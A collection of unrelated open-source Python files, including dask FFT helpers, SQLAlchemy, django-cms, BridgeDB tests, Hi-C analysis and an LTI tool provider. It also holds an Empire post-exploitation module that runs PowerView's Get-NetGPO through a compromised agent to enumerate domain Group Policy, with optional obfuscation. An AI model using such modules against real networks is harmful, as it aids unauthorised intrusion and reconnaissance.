chunks[axis] = (n//2 + 1,)
return chunks
def _irfft_out_chunks(a, n, axis):
if n is None:
n = 2 * (a.chunks[axis][0] - 1)
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _hfft_out_chunks(a, n, axis):
if n is None:
n = 2 * (a.chunks[axis][0] - 1)
chunks = list(a.chunks)
chunks[axis] = (n,)
return chunks
def _ihfft_out_chunks(a, n, axis):
if n is None:
n = a.chunks[axis][0]
chunks = list(a.chunks)
if n % 2 == 0:
m = (n//2) + 1
else:
m = (n + 1)//2
chunks[axis] = (m,)
return chunks
fft = _fft_wrap(npfft.fft, np.complex_, _fft_out_chunks)
ifft = _fft_wrap(npfft.ifft, np.complex_, _fft_out_chunks)
rfft = _fft_wrap(npfft.rfft, np.complex_, _rfft_out_chunks)
irfft = _fft_wrap(npfft.irfft, np.float_, _irfft_out_chunks)
hfft = _fft_wrap(npfft.hfft, np.float_, _hfft_out_chunks)
ihfft = _fft_wrap(npfft.ihfft, np.complex_, _ihfft_out_chunks)
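# Added usage sketch (not part of the original module): the wrapped FFTs
# require the transformed axis to be a single chunk, so rechunk first.
# Shapes and chunk sizes below are illustrative only.
#
#   >>> import numpy as np
#   >>> import dask.array as da
#   >>> x = da.from_array(np.random.rand(8, 100), chunks=(4, 25))
#   >>> da.fft.fft(x, axis=1)        # raises ValueError: axis 1 has 4 chunks
#   >>> y = x.rechunk((4, 100))      # one chunk along the FFT axis
#   >>> da.fft.fft(y, axis=1).shape  # (8, 100), complex result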
| pombredanne/dask | dask/array/fft.py | Python | bsd-3-clause | 2,467 |
import six
from sqlalchemy import types
from sqlalchemy_utils import i18n, ImproperlyConfigured
from sqlalchemy_utils.primitives import Currency
from .scalar_coercible import ScalarCoercible
class CurrencyType(types.TypeDecorator, ScalarCoercible):
"""
Changes :class:`.Currency` objects to a string representation on the way in
and changes them back to :class:`.Currency` objects on the way out.
In order to use CurrencyType you need to install Babel_ first.
.. _Babel: http://babel.pocoo.org/
::
from sqlalchemy_utils import CurrencyType, Currency
class User(Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True)
name = sa.Column(sa.Unicode(255))
currency = sa.Column(CurrencyType)
user = User()
user.currency = Currency('USD')
session.add(user)
session.commit()
user.currency # Currency('USD')
user.currency.name # US Dollar
str(user.currency) # US Dollar
user.currency.symbol # $
CurrencyType is scalar coercible::
user.currency = 'USD'
user.currency  # Currency('USD')
"""
impl = types.String(3)
python_type = Currency
def __init__(self, *args, **kwargs):
if i18n.babel is None:
raise ImproperlyConfigured(
"'babel' package is required in order to use CurrencyType."
)
super(CurrencyType, self).__init__(*args, **kwargs)
def process_bind_param(self, value, dialect):
if isinstance(value, Currency):
return value.code
elif isinstance(value, six.string_types):
return value
def process_result_value(self, value, dialect):
if value is not None:
return Currency(value)
def _coerce(self, value):
if value is not None and not isinstance(value, Currency):
return Currency(value)
return value
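# Added sketch (not part of the original module): how values round-trip
# through bind/result processing, shown outside of a real Session. Babel must
# be installed for CurrencyType() to be constructible.
#
#   >>> ct = CurrencyType()
#   >>> ct.process_bind_param(Currency('USD'), dialect=None)   # -> 'USD'
#   >>> ct.process_result_value('USD', dialect=None)           # -> Currency('USD')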
| spoqa/sqlalchemy-utils | sqlalchemy_utils/types/currency.py | Python | bsd-3-clause | 1,984 |
import os
import sys
from optparse import OptionParser
import matplotlib
matplotlib.use('PDF')
from matplotlib.backends.backend_pdf import PdfPages
from mirnylib.systemutils import setExceptionHook
sys.path.append(os.path.split(os.getcwd())[0])
from hiclib.binnedData import binnedData, binnedDataAnalysis,\
experimentalBinnedData
from mirnylib import h5dict, genome
import mirnylib.systemutils
mirnylib.systemutils
from hiclib.fragmentHiC import HiCdataset
from mirnylib.numutils import EIG, coarsegrain, project, arrayInArray
import numpy
import mirnylib.plotting
import scipy.stats
import scipy.ndimage
from hiclib import fragmentHiC
cr = scipy.stats.spearmanr
import cPickle
from mirnylib.plotting import mat_img, removeAxes, removeBorder, niceShow
import matplotlib.pyplot as plt
# manage option and arguments processing
def main():
global options
global args
usage = '''usage: %prog [options] dataset1 dataset2 [datasetX]*
takes multiple hiclib output folder and compares the experiments in a pairwise manner
dataset1 should point to the "[ENZYME]-[EXPERIMENT]-fragment-dataset.hdf5" file
'''
parser = OptionParser(usage)
parser.add_option("-q", "--quiet", action="store_false", dest="verbose", default=True,
help="don't print status messages to stdout")
parser.add_option("-v", "--verbose", action="store_true", dest="verbose",
help="print status messages to stdout")
parser.add_option("-r", "--referenceGenome", type="string", dest="genome", default="",
help="genome in fasta format [default: %default]")
parser.add_option("-g", "--gapFile", type="string", dest="gapFile", default="gap.txt",
help="location of the gapfile [default: %default]")
parser.add_option("-o", "--outputDir", type="string", dest="outputDir", default="",
help="output directory [default: %default]")
parser.add_option("-t", "--tmpDir", type="string", dest="tmpDir", default="/tmp",
help="directory for temp files [default: %default]")
(options, args) = parser.parse_args()
if (len(args) < 2):
parser.print_help()
parser.error("[ERROR] Incorrect number of arguments, need at least two datasets")
if (options.genome == ""):
print >> sys.stderr, "[ERROR] Please specify the location of the reference genome in fasta format"
sys.exit(1)
if (options.outputDir != ""):
options.outputDir += os.sep
if (options.verbose):
print >> sys.stdout, "outputDir: %s" % (options.outputDir)
print >> sys.stdout, "tmpDir: %s" % (options.tmpDir)
process()
def calculateTanayCorrelation(resolution, filename1, filename2, experiment1, experiment2, genome, outfile, mouse=False, **kwargs):
"Calculates correlation between datasets, smoothed in a Tanay way"
global pp
if (options.verbose):
print >> sys.stdout, "calculateTanayCorrelation: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
BD = binnedData(resolution, genome)
BD.simpleLoad(filename1, experiment1)
BD.simpleLoad(filename2, experiment2)
def tanaySmooth(matrix):
matrix = numpy.array(matrix, dtype="double")
a = numpy.arange(-9, 10)
mat = 1 / (1. + numpy.abs(a[:, None]) + numpy.abs(a[None, :]))
return scipy.ndimage.filters.convolve(input=matrix,
weights=mat,
mode="constant")
def propagateSmooth(data):
mask1 = numpy.sum(data, axis=0) > 0
mask = mask1[:, None] * mask1[None, :]
ret = numpy.zeros_like(data, dtype=float)
for i in xrange(BD.genome.chrmCount):
for j in xrange(BD.genome.chrmCount):
beg1 = BD.chromosomeStarts[i]
beg2 = BD.chromosomeStarts[j]
end1 = BD.chromosomeEnds[i]
end2 = BD.chromosomeEnds[j]
mymask = mask[beg1:end1, beg2:end2]
d = data[beg1:end1, beg2:end2]
toret = tanaySmooth(d) / tanaySmooth(mymask)
toret[mymask == 0] = 0
ret[beg1:end1, beg2:end2] = toret
return ret
BD.removePoorRegions(cutoff=2)
BD.removeCis()
BD.iterativeCorrectWithoutSS()
data1 = BD.dataDict[experiment1]
data2 = BD.dataDict[experiment2]
mask = (numpy.sum(data1, axis=0) > 0) * (numpy.sum(data2, axis=0) > 0)
validMask = mask[:, None] * mask[None, :]
transmask = BD.chromosomeIndex[:, None] != BD.chromosomeIndex[None, :]
cormask = transmask * validMask
d1 = propagateSmooth(data1)
d2 = propagateSmooth(data2)
(scorr, pvalue) = scipy.stats.spearmanr(d1[cormask], d2[cormask])
outfile.write("Spearman corrleation %s %s %.4f %.4f" % (filename1, filename2, scorr, pvalue))
def compareInterarmMaps(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"plots witn 8 inetrarm maps - paper supplement figure"
global pp
if (options.verbose):
print >> sys.stdout, "compareInterarmMaps: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
Tanay = binnedDataAnalysis(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal()
Tanay.removePoorRegions(cutoff=2)
#Tanay.removeStandalone(3)
fs = 10
vmin = None
vmax = None
plt.figure(figsize=(12, 16))
plt.subplot(421)
plt.title(experiment1+", raw", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(422)
plt.title(experiment2+", raw", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.iterativeCorrectWithSS()
vmin = None
vmax = None
plt.subplot(425)
plt.title(experiment1+", with SS reads", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(426)
plt.title(experiment2+", with SS reads", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.iterativeCorrectWithoutSS()
vmin = None
vmax = None
plt.subplot(423)
plt.title(experiment1+", no SS reads", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(424)
plt.title(experiment2+", no ss reads", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
Tanay.fakeCis()
vmin = None
vmax = None
plt.subplot(427)
plt.title(experiment1+", trans only", fontsize=fs)
Tanay.averageTransMap(experiment1, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.subplot(428)
plt.title(experiment2+", trans only", fontsize=fs)
Tanay.averageTransMap(experiment2, vmin=vmin, vmax=vmax)
plt.colorbar()
plt.show()
pp.savefig()
def compareCorrelationOfEigenvectors(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"""Plot correlation figure with eigenvector correlation between datasets
paper figure """
global pp
if (options.verbose):
print >> sys.stdout, "compareCorrelationOfEigenvectors: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
plt.figure()
Tanay = binnedDataAnalysis(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal()
Tanay.removePoorRegions()
Tanay.removeZeros()
Tanay.truncTrans()
Tanay.fakeCis()
M = 10
Tanay.doEig(numPCs=M)
E1 = Tanay.EigDict[experiment1]
E2 = Tanay.EigDict[experiment2]
data = numpy.zeros((M, M))
for i in xrange(M):
for j in xrange(M):
data[i][j] = abs(numpy.corrcoef(E2[i], E1[j])[0, 1])
plt.figure(figsize=(8, 8))
plt.gcf().subplots_adjust(0.2, 0.2, 0.85, 0.85)
plt.subplot(111)
plt.xlabel(experiment1)
plt.ylabel(experiment2)
#plt.title("Abs. correlation between eigenvectors")
plt.imshow(data, interpolation="nearest", vmin=0, vmax=1)
plt.colorbar()
plt.show()
pp.savefig()
def plotDiagonalCorrelation(resolution, filename1, filename2, experiment1, experiment2, genome, mouse=False, **kwargs):
"Correlation of diagonal bins - paper figure"
global pp
if (options.verbose):
print >> sys.stdout, "plotDiagonalCorrelation: res: %d file1: %s file2: %s exp1:%s exp2:%s gen:%s" % (resolution, filename1, filename2, experiment1, experiment2, genome)
S = 50
x = numpy.arange(2, S)
Tanay = binnedData(resolution, genome)
Tanay.simpleLoad(filename1, experiment1)
Tanay.simpleLoad(filename2, experiment2)
Tanay.removeDiagonal(1)
Tanay.removePoorRegions()
Tanay.removeZeros()
pairs = [(experiment1, experiment2)]
cors = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
Tanay.iterativeCorrectWithoutSS(M=1)
cors2 = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors2[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
Tanay.iterativeCorrectWithoutSS(M=20)
cors3 = [[] for _ in pairs]
for i in x:
for j, pair in enumerate(pairs):
cors3[j].append(cr(
numpy.diagonal(Tanay.dataDict[pair[0]], i),
numpy.diagonal(Tanay.dataDict[pair[1]], i)
)[0])
matplotlib.rcParams['font.sans-serif'] = 'Arial'
print "Eigenvectors"
print cors
print cors2
print cors3
plt.figure(figsize=(8, 4))
ax = plt.gca()
for j, pair in enumerate(pairs):
plt.subplot(1, len(pairs), j + 1)
fs = 8
for xlabel_i in ax.get_xticklabels():
xlabel_i.set_fontsize(fs)
for xlabel_i in ax.get_yticklabels():
xlabel_i.set_fontsize(fs)
plt.title("%s vs %s" % pair)
plt.plot(x / 5., cors3[j], color="#E5A826", label="Iterative")
plt.plot(x / 5., cors2[j], color="#28459A", label="Single")
plt.plot(x / 5., cors[j], color="#E55726", label="Raw")
plt.xlabel("Genomic Separation, MB", fontsize=8)
plt.ylabel("Spearman correlation", fontsize=8)
plt.legend()
legend = plt.legend(prop={"size": 6}, loc=9, handlelength=2)
legend.draw_frame(False)
plt.ylim((0, 1))
removeAxes(shift=0)
plt.show()
pp.savefig()
def process():
global options
global args
global pp
outfilename = []
# check dataset exist
for i in xrange(len(args)):
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-1M.hdf5')
sys.exit(1)
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-200k.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-200k.hdf5')
sys.exit(1)
if (not os.path.isfile(args[i].replace('-fragment_dataset.hdf5','-IC-1M.hdf5'))):
print '[ERROR] Could not find: '+ args[i].replace('-fragment_dataset.hdf5','-IC-1M.hdf5')
sys.exit(1)
outfilename += ["_".join(os.path.basename(args[i]).strip("-fragment_dataset.hdf5").split("_")[1:])]
genome_db = genome.Genome(options.genome, gapFile=options.gapFile, readChrms=['#', 'X', 'Y'])
outfilename = "-".join(outfilename)
outfile = open(options.outputDir+outfilename+'-HiC_correlate.txt',"w")
fig = plt.figure()
pp = PdfPages(options.outputDir+outfilename+'-HiC_correlate.pdf')
for i in xrange(len(args)):
print " Process file "+str(i)+":"+ args[i]
enzyme_i = os.path.basename(args[i]).split("_")[0]
experiment_i = "_".join(os.path.basename(args[i]).strip("-fragment_dataset.hdf5").split("_")[1:])
for j in xrange(i+1, len(args)):
enzyme_j = os.path.basename(args[j]).split("_")[0]
experiment_j = "_".join(os.path.basename(args[j]).strip("-fragment_dataset.hdf5").split("_")[1:])
compareCorrelationOfEigenvectors(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db)
calculateTanayCorrelation(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db, outfile)
plotDiagonalCorrelation(200000, args[i].replace('-fragment_dataset.hdf5','-200k.hdf5'), args[j].replace('-fragment_dataset.hdf5','-200k.hdf5'), experiment_i, experiment_j, genome_db)
compareInterarmMaps(1000000, args[i].replace('-fragment_dataset.hdf5','-1M.hdf5'), args[j].replace('-fragment_dataset.hdf5','-1M.hdf5'), experiment_i, experiment_j, genome_db)
if (options.verbose):
print >> sys.stdout, "print plots into pdf:%s" % (options.outputDir+outfilename+'-HiC_correlate.pdf')
outfile.close()
pp.close()
######################################
# main
######################################
if __name__ == "__main__":
main()
|
BauerLab/ngsane
|
tools/hiclibCorrelate.py
|
Python
|
bsd-3-clause
| 13,472
|
from cms.utils.compat.dj import python_2_unicode_compatible
from django.db import models
from django.utils.translation import ugettext_lazy as _
from cms.models import CMSPlugin, Page
@python_2_unicode_compatible
class Link(CMSPlugin):
"""
A link to another page or to an external website
"""
name = models.CharField(_("name"), max_length=256)
url = models.URLField(_("link"), blank=True, null=True)
page_link = models.ForeignKey(Page, verbose_name=_("page"), blank=True, null=True, help_text=_("A link to a page has priority over a text link."))
mailto = models.EmailField(_("mailto"), blank=True, null=True, help_text=_("An email address has priority over a text link."))
target = models.CharField(_("target"), blank=True, max_length=100, choices=((
("", _("same window")),
("_blank", _("new window")),
("_parent", _("parent window")),
("_top", _("topmost frame")),
)))
def link(self):
"""
Returns the link with highest priority among the model fields
"""
if self.mailto:
return u"mailto:%s" % self.mailto
elif self.url:
return self.url
elif self.page_link:
return self.page_link.get_absolute_url()
else:
return ""
def __str__(self):
return self.name
search_fields = ('name',)
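# Illustration only (behaviour follows link() above, not the help_text strings):
# an instance with mailto='someone@example.com' and url='http://example.com'
# renders as 'mailto:someone@example.com'; url is used when mailto is empty,
# and page_link.get_absolute_url() only when both mailto and url are empty.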
|
SinnerSchraderMobileMirrors/django-cms
|
cms/plugins/link/models.py
|
Python
|
bsd-3-clause
| 1,377
|
# -*- coding: utf-8 -*-
#
# This file is part of BridgeDB, a Tor bridge distribution system.
#
# :authors: Isis Lovecruft 0xA3ADB67A2CDB8B35 <isis@torproject.org>
# :copyright: (c) 2014, Isis Lovecruft
# (c) 2014, The Tor Project, Inc.
# :license: 3-Clause BSD, see LICENSE for licensing information
from twisted.trial import unittest
from bridgedb import translations
from bridgedb.test.test_HTTPServer import DummyRequest
REALISH_HEADERS = {
b'Accept-Encoding': [b'gzip, deflate'],
b'User-Agent': [
b'Mozilla/5.0 (X11; Linux x86_64; rv:28.0) Gecko/20100101 Firefox/28.0'],
b'Accept': [
b'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'],
}
# Add this to the above REALISH_HEADERS to use it:
ACCEPT_LANGUAGE_HEADER = {
b'Accept-Language': [b'de-de,en-gb;q=0.8,en;q=0.5,en-us;q=0.3'],
}
class TranslationsMiscTests(unittest.TestCase):
"""Tests for module-level code in ``bridgedb.translations`` module."""
def test_getLocaleFromHTTPRequest_withLangParam(self):
"""This request uses a '?lang=ar' param, without an 'Accept-Language'
header.
The request result should be: ['ar', 'en', 'en_US'].
"""
request = DummyRequest([b"bridges"])
request.headers.update(REALISH_HEADERS)
request.args.update({
b'transport': [b'obfs3',],
b'lang': [b'ar',],
})
parsed = translations.getLocaleFromHTTPRequest(request)
self.assertEqual(parsed[0], 'ar')
self.assertEqual(parsed[1], 'en')
self.assertEqual(parsed[2], 'en_US')
self.assertEqual(len(parsed), 3)
def test_getLocaleFromHTTPRequest_withLangParam_AcceptLanguage(self):
"""This request uses a '?lang=ar' param, with an 'Accept-Language'
header which includes: ['de-de', 'en-gb', 'en', 'en-us'].
The request result should be: ['fa', 'de-de', 'en-gb', 'en', 'en-us'].
"""
request = DummyRequest([b"options"])
request.headers.update(ACCEPT_LANGUAGE_HEADER)
request.args.update({b'lang': [b'fa']})
parsed = translations.getLocaleFromHTTPRequest(request)
self.assertEqual(parsed[0], 'fa')
self.assertEqual(parsed[1], 'en')
self.assertEqual(parsed[2], 'en_US')
#self.assertEqual(parsed[3], 'en-gb')
self.assertEqual(len(parsed), 3)
def test_getLocaleFromPlusAddr(self):
emailAddr = 'bridges@torproject.org'
replyLocale = translations.getLocaleFromPlusAddr(emailAddr)
self.assertEqual('en', replyLocale)
def test_getLocaleFromPlusAddr_ar(self):
emailAddr = 'bridges+ar@torproject.org'
replyLocale = translations.getLocaleFromPlusAddr(emailAddr)
self.assertEqual('ar', replyLocale)
|
pagea/bridgedb
|
lib/bridgedb/test/test_translations.py
|
Python
|
bsd-3-clause
| 2,789
|
# !! WARNING !!
# Don't put any code here, because Sublime Text will load this file twice and
# it may cause unexpected behavior. Use _init_.py instead.
|
guillermooo/dart-sublime-bundle
|
__init__.py
|
Python
|
bsd-3-clause
| 153
|
from lib.common import helpers
class Module:
def __init__(self, mainMenu, params=[]):
self.info = {
'Name': 'Get-NetGPO',
'Author': ['@harmj0y'],
'Description': ('Gets a list of all current GPOs in a domain. Part of PowerView.'),
'Background' : True,
'OutputExtension' : None,
'NeedsAdmin' : False,
'OpsecSafe' : True,
'Language' : 'powershell',
'MinLanguageVersion' : '2',
'Comments': [
'https://github.com/PowerShellMafia/PowerSploit/blob/dev/Recon/'
]
}
# any options needed by the module, settable during runtime
self.options = {
# format:
# value_name : {description, required, default_value}
'Agent' : {
'Description' : 'Agent to run module on.',
'Required' : True,
'Value' : ''
},
'GPOname' : {
'Description' : 'The GPO name to query for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'DisplayName' : {
'Description' : 'The GPO display name to query for, wildcards accepted.',
'Required' : False,
'Value' : ''
},
'ComputerName' : {
'Description' : 'Return all GPO objects applied to a given computer (FQDN).',
'Required' : False,
'Value' : ''
},
'Domain' : {
'Description' : 'The domain to use for the query, defaults to the current domain.',
'Required' : False,
'Value' : ''
},
'DomainController' : {
'Description' : 'Domain controller to reflect LDAP queries through.',
'Required' : False,
'Value' : ''
},
'ADSpath' : {
'Description' : 'The LDAP source to search through.',
'Required' : False,
'Value' : ''
}
}
# save off a copy of the mainMenu object to access external functionality
# like listeners/agent handlers/etc.
self.mainMenu = mainMenu
for param in params:
# parameter format is [Name, Value]
option, value = param
if option in self.options:
self.options[option]['Value'] = value
def generate(self, obfuscate=False, obfuscationCommand=""):
moduleName = self.info["Name"]
# read in the common powerview.ps1 module source code
moduleSource = self.mainMenu.installPath + "/data/module_source/situational_awareness/network/powerview.ps1"
try:
f = open(moduleSource, 'r')
except:
print helpers.color("[!] Could not read module source path at: " + str(moduleSource))
return ""
moduleCode = f.read()
f.close()
# get just the code needed for the specified function
script = helpers.generate_dynamic_powershell_script(moduleCode, moduleName)
script += moduleName + " "
for option,values in self.options.iteritems():
if option.lower() != "agent":
if values['Value'] and values['Value'] != '':
if values['Value'].lower() == "true":
# if we're just adding a switch
script += " -" + str(option)
else:
script += " -" + str(option) + " " + str(values['Value'])
script += ' | Out-String | %{$_ + \"`n\"};"`n'+str(moduleName)+' completed!"'
if obfuscate:
script = helpers.obfuscate(self.mainMenu.installPath, psScript=script, obfuscationCommand=obfuscationCommand)
return script
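# Illustration only (the option values below are made-up examples, not defaults
# of this module): with Domain='testlab.local' and GPOname='*audit*', generate()
# yields the powerview.ps1 source followed by roughly
#
#   Get-NetGPO -Domain testlab.local -GPOname *audit* | Out-String | %{$_ + "`n"};"Get-NetGPO completed!"
#
# i.e. one "-Option Value" pair per non-empty, non-Agent option, with boolean
# "true" values emitted as bare switches.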
|
Hackplayers/Empire-mod-Hackplayers
|
lib/modules/powershell/situational_awareness/network/powerview/get_gpo.py
|
Python
|
bsd-3-clause
| 4,131
|
from .helper import IntegrationHelper
class TestGitHubIterator(IntegrationHelper):
def test_resets_etag(self):
cassette_name = self.cassette_name('resets_etag')
with self.recorder.use_cassette(cassette_name):
users_iter = self.gh.iter_all_users(number=10)
assert users_iter.etag is None
next(users_iter) # Make the request
assert users_iter.etag is not None
users_iter.refresh()
assert users_iter.etag is None
|
adrianmoisey/github3.py
|
tests/integration/test_structs.py
|
Python
|
bsd-3-clause
| 505
|
from pyquery import PyQuery as pq
from nose.tools import eq_
import amo.tests
from translations import models, widgets
class TestWidget(amo.tests.TestCase):
def test_avoid_purified_translation(self):
# Even if we pass in a LinkifiedTranslation the widget switches to a
# normal Translation before rendering.
w = widgets.TransTextarea.widget()
link = models.LinkifiedTranslation(localized_string='<b>yum yum</b>',
locale='fr', id=10)
link.clean()
widget = w.render('name', link)
eq_(pq(widget).html(), '<b>yum yum</b>')
def test_default_locale(self):
w = widgets.TransTextarea()
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'en-us')
w.default_locale = 'pl'
result = w.render('name', '')
eq_(pq(result)('textarea:not([lang=init])').attr('lang'), 'pl')
|
Joergen/zamboni
|
apps/translations/tests/test_widgets.py
|
Python
|
bsd-3-clause
| 954
|
#
# Readout.py -- Readout for displaying image cursor information
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga.gw import Widgets
from ginga.misc import Bunch
class Readout(object):
def __init__(self, width, height):
readout = Widgets.Label('', halign='center', style='clickable')
#readout.resize(width, height)
readout.set_color(bg="#202030", fg="lightgreen")
self.readout = readout
self.maxx = 0
self.maxy = 0
self.maxv = 0
self.fitsimage = None
def get_widget(self):
return self.readout
def set_font(self, font):
self.readout.set_font(font)
def set_text(self, text):
self.readout.set_text(text)
# END
|
rajul/ginga
|
ginga/gw/Readout.py
|
Python
|
bsd-3-clause
| 883
|
#!/usr/bin/python
#
# linearize-hashes.py: List blocks in a linear, no-fork version of the chain.
#
# Copyright (c) 2013-2015 The Bitcoin developers
# Distributed under the MIT/X11 software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
import json
import struct
import re
import base64
import httplib
import sys
settings = {}
class PepeCoinRPC:
OBJID = 1
def __init__(self, host, port, username, password):
authpair = "%s:%s" % (username, password)
self.authhdr = "Basic %s" % (base64.b64encode(authpair))
self.conn = httplib.HTTPConnection(host, port, False, 30)
def rpc(self, method, params=None):
self.OBJID += 1
obj = { 'version' : '1.1',
'method' : method,
'id' : self.OBJID }
if params is None:
obj['params'] = []
else:
obj['params'] = params
self.conn.request('POST', '/', json.dumps(obj),
{ 'Authorization' : self.authhdr,
'Content-type' : 'application/json' })
resp = self.conn.getresponse()
if resp is None:
print "JSON-RPC: no response"
return None
body = resp.read()
resp_obj = json.loads(body)
if resp_obj is None:
print "JSON-RPC: cannot JSON-decode body"
return None
if 'error' in resp_obj and resp_obj['error'] != None:
return resp_obj['error']
if 'result' not in resp_obj:
print "JSON-RPC: no result in object"
return None
return resp_obj['result']
def getblock(self, hash, verbose=True):
return self.rpc('getblock', [hash, verbose])
def getblockhash(self, index):
return self.rpc('getblockhash', [index])
def get_block_hashes(settings):
rpc = PepeCoinRPC(settings['host'], settings['port'],
settings['rpcuser'], settings['rpcpassword'])
for height in xrange(settings['min_height'], settings['max_height']+1):
hash = rpc.getblockhash(height)
print(hash)
if __name__ == '__main__':
if len(sys.argv) != 2:
print "Usage: linearize-hashes.py CONFIG-FILE"
sys.exit(1)
f = open(sys.argv[1])
for line in f:
# skip comment lines
m = re.search('^\s*#', line)
if m:
continue
# parse key=value lines
m = re.search('^(\w+)\s*=\s*(\S.*)$', line)
if m is None:
continue
settings[m.group(1)] = m.group(2)
f.close()
if 'host' not in settings:
settings['host'] = '127.0.0.1'
if 'port' not in settings:
settings['port'] = 31500
if 'min_height' not in settings:
settings['min_height'] = 0
if 'max_height' not in settings:
settings['max_height'] = 319000
if 'rpcuser' not in settings or 'rpcpassword' not in settings:
print "Missing username and/or password in cfg file"
sys.exit(1)
settings['port'] = int(settings['port'])
settings['min_height'] = int(settings['min_height'])
settings['max_height'] = int(settings['max_height'])
get_block_hashes(settings)
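# Example CONFIG-FILE contents (illustrative values only; any key that is
# omitted falls back to the defaults assigned above, and only
# rpcuser/rpcpassword are mandatory):
#
#   host=127.0.0.1
#   port=31500
#   rpcuser=alice
#   rpcpassword=secret
#   min_height=0
#   max_height=319000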
|
cyberpepe/pepecoin-core
|
src/contrib/linearize/linearize-hashes.py
|
Python
|
mit
| 2,846
|
from launch_params import LaunchParamsMixin
from request_validator import (
RequestValidatorMixin,
FlaskRequestValidatorMixin,
DjangoRequestValidatorMixin,
WebObRequestValidatorMixin
)
from outcome_request import OutcomeRequest
from collections import defaultdict
import re
from urllib import urlencode
from urlparse import urlsplit, urlunsplit
try:
from urlparse import parse_qsl
except ImportError:
# fall back for Python 2.5
from cgi import parse_qsl # NOQA
accessors = [
'consumer_key',
'consumer_secret',
'outcome_requests',
'lti_errormsg',
'lti_errorlog',
'lti_msg',
'lti_log'
]
class ToolProvider(LaunchParamsMixin, RequestValidatorMixin, object):
'''
Implements the LTI Tool Provider.
'''
def __init__(self, consumer_key, consumer_secret, params={}):
'''
Create new ToolProvider.
'''
# Initialize all class accessors to None
for param in accessors:
setattr(self, param, None)
# These are hyper important class members that we init first
self.consumer_key = consumer_key
self.consumer_secret = consumer_secret
# Call superclass initializers
super(ToolProvider, self).__init__()
self.non_spec_params = defaultdict(lambda: None)
self.outcome_requests = []
self.params = params
self.process_params(params)
def has_role(self, role):
'''
Check whether the Launch Parameters set the role.
'''
return self.roles and any([re.search(role, our_role, re.I)
for our_role in self.roles])
def is_student(self):
'''
Convenience method for checking if the user has 'learner' or 'student'
role.
'''
return any((self.has_role('learner'),
self.has_role('student')))
def is_instructor(self):
'''
Convenience method for checking if user has 'instructor', 'faculty'
or 'staff' role.
Currently this does not support the TeachingAssistant role
'''
return any((self.has_role('instructor'),
self.has_role('faculty'),
self.has_role('staff')))
def is_launch_request(self):
'''
Check if the request was an LTI Launch Request.
'''
return self.lti_message_type == 'basic-lti-launch-request'
def is_outcome_service(self):
'''
Check if the Tool Launch expects an Outcome Result.
'''
return (self.lis_outcome_service_url and
self.lis_result_sourcedid)
def username(self, default=None):
'''
Return the full, given, or family name if set.
'''
if self.lis_person_name_given:
return self.lis_person_name_given
elif self.lis_person_name_family:
return self.lis_person_name_family
elif self.lis_person_name_full:
return self.lis_person_name_full
else:
return default
def post_replace_result(self, score, outcome_opts=defaultdict(lambda:None), result_data=None):
'''
POSTs the given score to the Tool Consumer with a replaceResult.
Returns OutcomeResponse object and stores it in self.outcome_request
OPTIONAL:
result_data must be a dictionary
Note: ONLY ONE of these values can be in the dict at a time,
due to the Canvas specification.
'text' : str text
'url' : str url
'''
return self.new_request(outcome_opts).post_replace_result(score, result_data)
def post_delete_result(self,outcome_opts=defaultdict(lambda:None)):
'''
POSTs a delete request to the Tool Consumer.
'''
return self.new_request(outcome_opts).post_delete_result()
def post_read_result(self,outcome_opts=defaultdict(lambda:None)):
'''
POSTs a readResult request to the Tool Consumer; the returned
OutcomeResponse will have the current score.
'''
return self.new_request(outcome_opts).post_read_result()
def last_outcome_request(self):
'''
Returns the most recent OutcomeRequest.
'''
return self.outcome_requests[-1]
def last_outcome_success(self):
